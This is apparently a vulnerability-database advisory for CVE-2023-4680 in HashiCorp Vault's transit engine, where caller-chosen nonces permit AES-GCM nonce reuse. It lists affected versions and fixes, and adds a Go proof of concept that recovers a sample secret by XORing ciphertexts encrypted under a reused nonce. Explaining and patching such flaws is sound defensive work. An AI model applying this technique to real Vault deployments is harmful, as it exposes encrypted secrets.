Sze Chuen Tan

Researcher at Cloudflare
Rank #39,959 of 53,638
Total CVSS: 6.8
Vulnerabilities · 1
PT-2023-9602
6.8
2023-09-14
Hashicorp · Hashicorp Vault · CVE-2023-4680
**Name of the Vulnerable Software and Affected Versions**

HashiCorp Vault and Vault Enterprise:
- 1.6.0 through 1.12.10
- 1.13.0 through 1.13.6
- 1.14.0 through 1.14.2

**Description**

The transit secrets engine of HashiCorp Vault and Vault Enterprise does not properly validate the optional nonce supplied with an encryption request: an authorized user (one whose token or policy grants access to the `encrypt` endpoint) can specify an arbitrary nonce even when convergent encryption is disabled on the key. Transit keys of the default `aes256-gcm96` type are AES-GCM keys, and reusing a nonce under one AES-GCM key reproduces the same keystream, so two ciphertexts under a reused nonce leak the XOR of their plaintexts and, with two or more such ciphertexts, allow the GHASH authentication subkey to be recovered. An attacker can therefore call `encrypt` with a chosen plaintext and the nonce of a captured ciphertext, then complete the attack offline to decrypt arbitrary ciphertext and potentially derive the authentication subkey.

**Recommendations**

- For versions 1.6.0 through 1.12.10, update to version 1.12.11.
- For versions 1.13.0 through 1.13.6, update to version 1.13.7.
- For versions 1.14.0 through 1.14.2, update to version 1.14.3.

As a temporary workaround until the upgrade can be applied, restrict access to the transit `encrypt` endpoint (for example, through Vault ACL policies) to the smallest set of principals that need it.
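To make the impact of an attacker-chosen nonce concrete, the following is an added example written for this page, not Vault's own code, in Go (the language Vault is written in). It models the transit `encrypt` call as a local AES-GCM `Seal` that honours a caller-supplied nonce, and shows the offline step: once the attacker has obtained the ciphertext of a chosen (here all-zero) plaintext under the same key and nonce as a captured ciphertext, XORing the two ciphertexts with the chosen plaintext recovers the captured plaintext. The same function run with a distinct nonce for the attacker's request shows why the fix (refusing caller nonces) closes the attack. The key, nonces and secret are constructed sample values; the authentication-subkey recovery that the advisory also mentions is not shown.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// sealWithNonce stands in for a transit encrypt call that honours a
// caller-supplied nonce (the behaviour fixed in CVE-2023-4680). It returns
// ciphertext followed by the 16-byte GCM tag, exactly as cipher.AEAD.Seal does.
func sealWithNonce(key, nonce, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	aead, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return aead.Seal(nil, nonce, plaintext, nil), nil
}

// stripTag drops the trailing 16-byte GCM authentication tag; the offline
// attack only needs the CTR-mode keystream portion of the ciphertext.
func stripTag(sealed []byte) []byte {
	return sealed[:len(sealed)-16]
}

// xorRecover is the offline step. Under a reused key and nonce AES-GCM emits
// the same keystream, so C_victim XOR C_chosen XOR P_chosen == P_victim.
func xorRecover(victimCT, chosenCT, chosenPT []byte) []byte {
	n := len(victimCT)
	if len(chosenCT) < n {
		n = len(chosenCT)
	}
	out := make([]byte, n)
	for i := 0; i < n; i++ {
		out[i] = victimCT[i] ^ chosenCT[i] ^ chosenPT[i]
	}
	return out
}

// Recover plays both sides. The victim encrypts secret under (key, victimNonce).
// The attacker, who needs only encrypt access and the captured ciphertext,
// requests encryption of an all-zero plaintext of the same length under
// attackerNonce and XORs the results. With attackerNonce == victimNonce (the
// pre-fix behaviour) this yields the secret; with a distinct nonce it yields
// unrelated bytes.
func Recover(key, victimNonce, attackerNonce, secret []byte) ([]byte, error) {
	victim, err := sealWithNonce(key, victimNonce, secret)
	if err != nil {
		return nil, err
	}
	chosen := make([]byte, len(secret)) // attacker-chosen all-zero plaintext
	attacker, err := sealWithNonce(key, attackerNonce, chosen)
	if err != nil {
		return nil, err
	}
	return xorRecover(stripTag(victim), stripTag(attacker), chosen), nil
}

func main() {
	key := []byte("0123456789abcdef0123456789abcdef") // constructed 32-byte AES-256 key
	nonce := []byte("unique-nonce")                    // constructed 12-byte GCM nonce
	secret := []byte("db-password=correct-horse-battery")

	got, err := Recover(key, nonce, nonce, secret)
	if err != nil {
		panic(err)
	}
	fmt.Printf("reused nonce:  recovered %q (match=%v)\n", got, bytes.Equal(got, secret))

	fresh := []byte("fresh-nonce!") // constructed distinct 12-byte nonce
	got, err = Recover(key, nonce, fresh, secret)
	if err != nil {
		panic(err)
	}
	fmt.Printf("fresh nonce:   recovered %q (match=%v)\n", got, bytes.Equal(got, secret))
}
```

The attacker never sees the key: the only inputs to the XOR step are the captured ciphertext, the attacker's own chosen plaintext, and the ciphertext the `encrypt` endpoint returned for it. This is why the patched versions ignore caller nonces for non-convergent keys and why restricting `encrypt` access is a meaningful interim control.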